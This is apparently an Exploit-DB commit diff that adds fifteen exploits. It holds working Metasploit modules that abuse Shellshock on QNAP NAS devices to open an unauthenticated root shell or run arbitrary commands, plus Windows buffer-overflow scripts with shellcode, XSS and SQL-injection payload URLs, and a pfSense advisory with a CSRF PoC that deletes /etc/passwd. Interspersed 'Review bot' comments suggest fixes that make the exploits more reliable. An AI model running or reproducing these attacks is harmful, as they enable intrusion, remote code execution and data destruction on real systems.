DB: 2015-03-27
15 new exploits
parent
3ab5d7365a
commit
0078b8567a
16 changed files with 576 additions and 0 deletions
15
files.csv
15
files.csv
@ -32909,3 +32909,18 @@ id,file,description,date,author,platform,type,port
36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0
36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
36491,platforms/windows/remote/36491.txt,"Adobe Flash Player Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
36492,platforms/php/webapps/36492.txt,"GraphicsClone Script 'term' parameter Cross-Site Scripting Vulnerability",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-01-04,"Mesut Timur",php,webapps,0
36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 'login.php' Script Cross Site Scripting Vulnerability",2012-01-04,"Gjoko Krstic",php,webapps,0
36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 'status' Parameter SQL Injection Vulnerability",2011-12-29,SiteWatch,php,webapps,0
36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 'SERVER[php_self]' Cross Site Scripting Vulnerability",2011-12-29,SiteWatch,php,webapps,0
36497,platforms/php/webapps/36497.txt,"UBB.threads 7.5.6 'Username' Field Cross Site Scripting Vulnerability",2012-01-04,sonyy,php,webapps,0
36498,platforms/php/webapps/36498.txt,"Yaws 1.88 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0
36499,platforms/php/webapps/36499.txt,"StatIt 4 'statistik.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0
36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 Directory Traversal Vulnerability",2012-01-05,demonalex,windows,remote,0
36501,platforms/windows/local/36501.py,"Mini-stream Ripper v2.7.7.100 Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0
36502,platforms/windows/local/36502.py,"RM Downloader 2.7.5.400 Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0
36503,platforms/hardware/remote/36503.rb,"QNAP admin shell via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,9993
36504,platforms/hardware/remote/36504.rb,"QNAP Web Server Remote Code Execution via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,0
36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0
36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0
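--- /dev/null
+++ b/platforms/hardware/remote/36503.rb
@@ -0,0 +1,119 @@
+# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection
+# Date: 7 February 2015
+# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
+# Employer homepage: http://www.securegroup.it
+# Vendor homepage: http://www.qnap.com
+# Version: All Turbo NAS models except TS-100, TS-101, TS-200
+# Tested on: TS-1279U-RP
+# CVE : 2014-6271
+# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
+
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/d3vpp/metasploit-modules
+##
+
+require 'msf/core'
+require 'net/telnet'
+
+class Metasploit3 < Msf::Auxiliary
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+include Msf::Auxiliary::CommandShell
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection',
+'Description' => %q{
+This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection.
+Affected products:
+All Turbo NAS models except TS-100, TS-101, TS-200
+},
+'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
+'License' => MSF_LICENSE,
+'References' => [
+['CVE', '2014-6271'], #aka ShellShock
+['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
+],
+'Platform' => ['unix']
+))
+
+register_options([
+OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
+OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993'])
+], self.class)
+end
+
+def check
+begin
+res = send_request_cgi({
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path),
+'agent' => "() { :;}; echo; /usr/bin/id"
+})
+rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+vprint_error("Connection failed")
+return Exploit::CheckCode::Unknown
+end
+
+if !res
+return Exploit::CheckCode::Unknown
+elsif res.code== 302 and res.body.include? 'uid'
+return Exploit::CheckCode::Vulnerable
+end
+return Exploit::CheckCode::Safe
+end
+
+
+def exploit_telnet()
+telnetport = datastore['LTELNET']
+
+print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
+
+print_status("#{rhost}:#{rport} - Sending exploit")
+begin
+sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+
+if sock
+print_good("#{rhost}:#{rport} - Backdoor service spawned")
+add_socket(sock)
+else
+fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not spawned")
+end
+
+print_status "Starting a Telnet session #{rhost}:#{telnetport}"
+merge_me = {
+'USERPASS_FILE' => nil,
+'USER_FILE' => nil,
+'PASS_FILE' => nil,
+'USERNAME' => nil,
+'PASSWORD' => nil
+}
+start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
+rescue
+fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not handled")
+end
+return
+end
+
+def run
+begin
+telnetport = datastore['LTELNET']
+res = send_request_cgi({
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path),
+'agent' => "() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &"
+})
+rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
+Rex::HostUnreachable => e
+fail_with(Failure::Unreachable, e)
+ensure
+disconnect
+end
+exploit_telnet()
+
+end
+
+end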
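Review bot: `run` never looks at `res` after the injection request, so `exploit_telnet` is entered even when `send_request_cgi` returned nil or the target did not execute the payload, and the operator then sees the unrelated "Backdoor service not handled" message; add `fail_with(Failure::Unknown, "#{rhost}:#{rport} - no response to injection request") unless res` before the call. The error path inside `exploit_telnet` is also misleading: as far as I know `Rex::Socket.create_tcp` raises on a refused connection rather than returning nil, so the `else` branch looks unreachable, and the bare `rescue` then swallows both that exception and the `fail_with` raised inside the `begin`, re-reporting everything as "not handled". Operationally the payload leaves an unauthenticated `/bin/sh` listener on `LTELNET`, bound to every interface of the NAS, and nothing in the module tears it down; it should at least `print_warning` that `utelnetd` must be killed on the target after the session ends, and the description should say so. `require 'net/telnet'` is unused and can be dropped.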
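--- /dev/null
+++ b/platforms/hardware/remote/36504.rb
@@ -0,0 +1,85 @@
+# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection
+# Date: 7 February 2015
+# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
+# Employer homepage: http://www.securegroup.it
+# Vendor homepage: http://www.qnap.com
+# Version: All Turbo NAS models except TS-100, TS-101, TS-200
+# Tested on: TS-1279U-RP
+# CVE : 2014-6271
+# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
+
+
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/d3vpp/metasploit-modules
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',
+'Description' => %q{
+This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.
+Affected products:
+All Turbo NAS models except TS-100, TS-101, TS-200
+},
+'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
+'License' => MSF_LICENSE,
+'References' => [
+['CVE', '2014-6271'], #aka ShellShock
+['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
+],
+'Platform' => ['unix']
+))
+
+register_options([
+OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
+OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd'])
+], self.class)
+end
+
+def check
+begin
+res = send_request_cgi({
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path),
+'agent' => "() { :;}; echo; /usr/bin/id"
+})
+rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+vprint_error("Connection failed")
+return Exploit::CheckCode::Unknown
+end
+
+if !res
+return Exploit::CheckCode::Unknown
+elsif res.code== 302 and res.body.include? 'uid'
+return Exploit::CheckCode::Vulnerable
+end
+return Exploit::CheckCode::Safe
+end
+
+
+def run
+
+res = send_request_cgi({
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path),
+'agent' => "() { :;}; echo; #{datastore['CMD']}"
+})
+
+if res.body.empty?
+print_error("No data found.")
+elsif res.code== 302
+print_status("#{rhost}:#{rport} - bash env variable injected")
+puts " "
+print_line(res.body)
+end
+end
+
+end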
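Review bot: `run` dereferences `res.body` without checking that `send_request_cgi` returned anything, so a timeout or refused connection ends in a `NoMethodError` on nil rather than a clean failure, and unlike `check` it has no rescue for `Rex::ConnectionRefused`/`Rex::HostUnreachable`; add `fail_with(Failure::Unreachable, "#{rhost}:#{rport} - no response") unless res` before the `if`. `datastore['CMD']` is interpolated verbatim into the User-Agent header, so a command containing CR or LF would corrupt the request; the option description should say so, or the module should reject `\r`/`\n` in it. The `res.code== 302 and res.body.include? 'uid'` test in `check` only reports Vulnerable when the CGI answers with a redirect; if a target returned the `id` output with a 200 the module would report Safe, so matching on `res.body =~ /uid=\d+/` regardless of status code would be more robust, and `&&` avoids the low-precedence `and`. Minor: the Metasploit URL in the header comment reads `http//metasploit.com/download` (missing colon).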
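--- /dev/null
+++ b/platforms/php/webapps/36492.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51258/info
+
+GraphicsClone Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/search/?term=<script>alert(document.cookie)</script>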
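--- /dev/null
+++ b/platforms/php/webapps/36493.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51260/info
+
+Orchard is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+Orchard 1.3.9 is vulnerable; other versions may be affected.
+
+http://www.example.com/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fwww.netsparker.com%3f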
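--- /dev/null
+++ b/platforms/php/webapps/36494.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51261/info
+
+Limny is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Limny 3.0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin/login.php/"/><script>alert('zsl')</script>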
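--- /dev/null
+++ b/platforms/php/webapps/36495.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51273/info
+
+Pligg CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Pligg CMS 1.1.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Audits/CMS/pligg_1.1.2/search.php?adv=1&status='and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0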
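--- /dev/null
+++ b/platforms/php/webapps/36496.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51274/info
+
+Pligg CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Pligg CMS 1.1.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/demo/search/')%7B%7Dalert('xss');if('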
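--- /dev/null
+++ b/platforms/php/webapps/36497.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/51275/info
+
+UBB.threads is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+UBB.threads 7.5.6 is vulnerable; other versions may also be affected.
+
+The following exploit data is available:
+
+http://www.example.com/forums/ubbthreads.php/ubb/login/lostpw/1
+
+POST /forums/ubbthreads.php
+ubb=start_page&Loginname=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&Email=&buttforgot=I+forgot+my+password
+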
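--- /dev/null
+++ b/platforms/php/webapps/36498.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/51276/info
+
+Yaws is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible.
+
+Yaws 1.88 is vulnerable; other versions may be affected.
+
+http://www.example.com/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
+http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
+http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
+http://www.example.com/editPage.yaws?node=home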
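--- /dev/null
+++ b/platforms/php/webapps/36499.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/51280/info
+
+StatIt is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+StatIt 4 is vulnerable; other versions may be affected.
+
+The following example URIs are available:
+
+http://www.example.com/statit4/statistik.php?st_id=1&action=stat_last%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&enc=333263120212292&agent=ari/534.30&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace
+
+http://www.example.com/statit4/statistik.php?action=stat_tld&st_id=1&show=more%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E\&PHPSESSID=d8679fc904017bdf6b09f5d88f7cf979
+
+http://www.example.com/statit4/statistik.php?action=stat_abfragen&st_id=1&show=more&order=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&sort=1&PHPSESSID=698bf9d1e988e3af70022f1dfb86fd33
+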
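--- /dev/null
+++ b/platforms/php/webapps/36506.txt
@@ -0,0 +1,105 @@
+Advisory ID: HTB23251
+Product: pfSense
+Vendor: Electric Sheep Fencing LLC
+Vulnerable Version(s): 2.2 and probably prior
+Tested Version: 2.2
+Advisory Publication: March 4, 2015 [without technical details]
+Vendor Notification: March 4, 2015
+Vendor Patch: March 5, 2015
+Public Disclosure: March 25, 2015
+Vulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
+CVE References: CVE-2015-2294, CVE-2015-2295
+Risk Level: Medium
+CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 5.4 (AV:N/AC:H/Au:N/C:N/I:N/A:C)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web interface of pfSense, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of pfSense and delete arbitrary files via CSRF (Cross-Site Request Forgery) attacks.
+
+Successful exploitation of the vulnerabilities may allow an attacker to delete arbitrary files on the system with root privileges, steal administrator’s cookies and gain complete control over the web application and even the entire system, as pfSense is running with root privileges and allows OS command execution via its web interface.
+
+
+1) Multiple XSS vulnerabilities in pfSense: CVE-2015-2294
+
+1.1 Input passed via the "zone" HTTP GET parameter to "/status_captiveportal.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
+
+https://[host]/status_captiveportal.php?zone=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+1.2 Input passed via the "if" and "dragtable" HTTP GET parameters to "/firewall_rules.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+Below are two PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup:
+
+https://[host]/firewall_rules.php?undodrag=1&dragtable=&if=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/firewall_rules.php?if=wan&undodrag=1&dragtable%5B%5D=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+1.3 Input passed via the "queue" HTTP GET parameter to "/firewall_shaper.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
+
+https://[host]/firewall_shaper.php?interface=wan&action=add&queue=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+1.4 Input passed via the "id" HTTP GET parameter to "/services_unbound_acls.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
+
+https://[host]/services_unbound_acls.php?act=edit&id=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+1.5 Input passed via the "filterlogentries_time", "filterlogentries_sourceipaddress", "filterlogentries_sourceport", "filterlogentries_destinationipaddress", "filterlogentries_interfaces", "filterlogentries_destinationport", "filterlogentries_protocolflags" and "filterlogentries_qty" HTTP GET parameters to "/diag_logs_filter.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+Below are eight PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup:
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_time=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_interfaces=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_protocolflags=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_qty=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+
+2) Cross-Site Request Forgery (CSRF) in pfSense: CVE-2015-2295
+
+2.1 The vulnerability exists due to insufficient validation of the HTTP request origin in "/system_firmware_restorefullbackup.php" script. A remote attacker can trick a log-in administrator to visit a malicious page with CSRF exploit and delete arbitrary files on the target system with root privileges.
+
+The following PoC code deletes file "/etc/passwd":
+
+https://[host]/system_firmware_restorefullbackup.php?deletefile=../etc/passwd
+
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Update to pfSense 2.2.1
+
+More Information:
+https://blog.pfsense.org/?p=1661
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23251 - https://www.htbridge.com/advisory/HTB23251 - Arbitrary file deletion and multiple XSS vulnerabilities in pfSense.
+[2] pfSense - https://www.pfsense.org - The pfSense® project is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.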
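Review bot: The CSRF PoC in section 2.1 demonstrates a second weakness the advisory never names: the `deletefile=../etc/passwd` value shows that `system_firmware_restorefullbackup.php` also accepts a `../` traversal sequence, so a fix limited to an anti-CSRF token would still let any authenticated administrator delete files outside the backup directory. It would help readers to state that a complete fix must both validate the request origin and canonicalise or whitelist `deletefile`, and that the trigger is a plain GET, which is what makes an `<img src>`-style page sufficient. The CVSSv2 vector given for the CSRF issue (`C:N/I:N/A:C`) scores only availability even though the text describes arbitrary file deletion as root, which is also an integrity loss; if that scoring was deliberate a sentence explaining it would avoid the question.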
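--- /dev/null
+++ b/platforms/windows/local/36501.py
@@ -0,0 +1,34 @@
+#!/usr/bin/env python
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: Mini-sream Ripper v2.7.7.100 Local Buffer Overflow
+#[+] Date: 25-03-2015
+#[+] Type: Local Exploits
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/43/Mini-streamRipper.exe?token=1427334864_8d9c5d7d948871f54ae14ed9304d1ddf&fileName=Mini-streamRipper.exe
+#[+] Friendly Sites: sec4ever.com
+#[+] Twitter: @TCYB3R
+#[+] Original POC:
+# http://www.exploit-db.com/exploits/11197/
+#POC:
+#IMG1:
+#http://i.imgur.com/ifXYgwx.png
+#IMG2:
+#http://i.imgur.com/ZMisj6R.png
+from struct import pack
+file="crack.m3u"
+junk="\x41"*35032
+eip=pack('<I',0x7C9D30D7)
+junk2="\x44"*4
+#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
+#http://www.exploit-db.com/exploits/28996/
+shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
+"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
+"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
+"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
+"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
+"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
+"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
+"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
+writeFile = open (file, "w")
+writeFile.write(junk+eip+junk2+shellcode)
+writeFile.close()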
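Review bot: The payload is written with `open (file, "w")`, i.e. text mode, so when this is run on the Windows host it targets any 0x0a byte in the buffer would be expanded to `\r\n` and shift the return-address offset; the embedded shellcode happens to contain no 0x0a, but `open(file, "wb")` removes the dependence on that accident. The return address `0x7C9D30D7` is hard-coded without naming the module or OS build it was taken from, while the header lists Windows 7 Pro as tested, where ASLR makes a fixed system-DLL address unreliable; the `eip=` line deserves a comment such as `# jmp/call esp in <module>, valid for Windows XP SP3 only - TODO confirm` so a reader can re-derive it. The title comment also misspells the product name (`Mini-sream`), which the files.csv entry spells correctly.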
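--- /dev/null
+++ b/platforms/windows/local/36502.py
@@ -0,0 +1,32 @@
+#!/usr/bin/env python
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow
+#[+] Date: 25-03-2015
+#[+] Type: Local Exploits
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe
+#[+] Friendly Sites: sec4ever.com
+#[+] Twitter: @TCYB3R
+#[+] Related Vulnerability/ies:
+# http://www.exploit-db.com/exploits/8628/
+#POC:
+#IMG1:
+#http://i.imgur.com/87sXIj8.png
+from struct import pack
+file="crack.ram"
+junk="\x41"*35032
+eip=pack('<I',0x7C9D30D7)
+junk2="\x44"*4
+#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
+#http://www.exploit-db.com/exploits/28996/
+shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
+"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
+"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
+"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
+"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
+"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
+"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
+"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
+writeFile = open (file, "w")
+writeFile.write(junk+eip+junk2+shellcode)
+writeFile.close()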
